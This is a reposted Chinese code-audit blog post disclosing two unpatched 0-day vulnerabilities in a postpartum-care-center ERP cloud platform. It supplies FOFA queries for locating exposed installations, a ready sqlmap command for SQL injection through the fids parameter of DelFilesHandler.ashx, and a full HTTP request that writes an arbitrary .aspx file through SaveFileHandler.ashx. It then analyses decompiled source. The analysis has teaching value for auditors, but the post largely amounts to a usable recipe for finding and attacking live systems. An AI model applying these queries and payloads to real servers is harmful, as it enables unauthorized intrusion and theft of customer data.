2026-02-10 14:27:10 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文披露了月子会所ERP管理云平台的两处高危0day漏洞。一是DelFilesHandler.ashx存在SQL注入，因未过滤fids参数直接拼接导致；二是SaveFileHandler.ashx存在任意文件上传，通过控制url参数可在服务器写入恶意aspx文件。文章提供了具体的漏洞POC、Sqlmap命令及利用步骤，并结合反编译的WebApp4.0.dll代码进行了深入分析。 综合评分： 90 文章分类： 代码审计,漏洞分析,漏洞POC,WEB安全

cover_image

[跟着静师傅学代码审计]月子会所ERP管理云平台0day审计

原创

静师傅静师傅

安静安全

2026年2月9日 17:06 广东

点击上方「蓝字」，关注我们

SQL注入漏洞0day

fofa:

body="月子护理ERP管理平台"&nbsp;|| body="妈妈宝盒客户端.rar"&nbsp;|| body="Page/Login/Login3.aspx"

sqlmap命令:

python&nbsp;sqlmap.py -u&nbsp;"http://IP:PORT/Page/upload/DelFilesHandler.ashx?fids=1"&nbsp;-p fids --batch

漏洞分析:

漏洞位于

\Page\upload\DelFilesHandler.ashx

对应DLL文件为WebApp4.0.dll

反编译DLL后来到WebApp4._0.Page.upload下的DelFilesHandler方法

主要问题代码:

string&nbsp;sql =&nbsp;$"select fileUrl,fileName from t_FileUploadDetail where 1=1 and Id in({fids})";DataTable dt = BRBase<t_FileUploadDetail>.SearchOnDataSet(sql).Tables[0];

1.fids参数直接从 context.Request.QueryString[“fids”] 获取。

2.没有进行任何验证、过滤或参数化处理。

3.直接拼接到SQL语句中形成SQL注入漏洞。

文件上传0day

先给出POC数据包:

POST&nbsp;/Page/upload/SaveFileHandler.ashx&nbsp;HTTP/1.1Host:&nbsp;IP:PORTContent-Type:&nbsp;application/jsonContent-Length:&nbsp;116
{&nbsp;&nbsp;"url":&nbsp;"OA/",&nbsp;&nbsp;"htmlname":&nbsp;"YYDS.aspx",&nbsp;&nbsp;"htmlstr":&nbsp;"<%= new Random().Next(100000,999999) %>"}

上传成功后访问路径:

http://IP:PORT/OA/YYDS.aspx

成功解析aspx

漏洞分析:

漏洞位于

\Page\upload\SaveFileHandler.ashx

对应DLL文件也为WebApp4.0.dll

反编译DLL后来到WebApp4._0.Page.upload下的SaveFileHandler方法

1.获取参数：通过getparm方法从请求体中获取参数，接收三个参数：url（上传路径）、htmlname（文件名）、htmlstr（内容）。

2.路径拼接：uploadFileName = HttpContext.Current.Server.MapPath(“../../” + uploadUrl); 这里使用了MapPath来将相对路径映射为物理路径，但是拼接了用户可控的uploadUrl，默认是到../../路径。

3.保存文件：将传入的htmlstr内容保存到指定的文件中。

4.通过../../路径可以到/OA目录下写入文件。

主要问题代码:

HtmlDocument&nbsp;doc&nbsp;=&nbsp;new&nbsp;HtmlDocument();doc.LoadHtml(html);doc.Save(uploadFileName, Encoding.GetEncoding("utf-8"));

直接保存到用户控制的路径因此形成文件上传漏洞。

往期文章推荐

[跟着静师傅学代码审计]itc中心管理服务器审计

[跟着静师傅学代码审计-全网首发]用友U9 V6.6企业版多组织企业互联网应用平台命令执行+SQL+反序列化

[跟着静师傅学代码审计]智慧校园(安校易)管理系统多处0day

点个「在看」，你最好看

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安静安全静师傅静师傅《[跟着静师傅学代码审计]月子会所ERP管理云平台0day审计》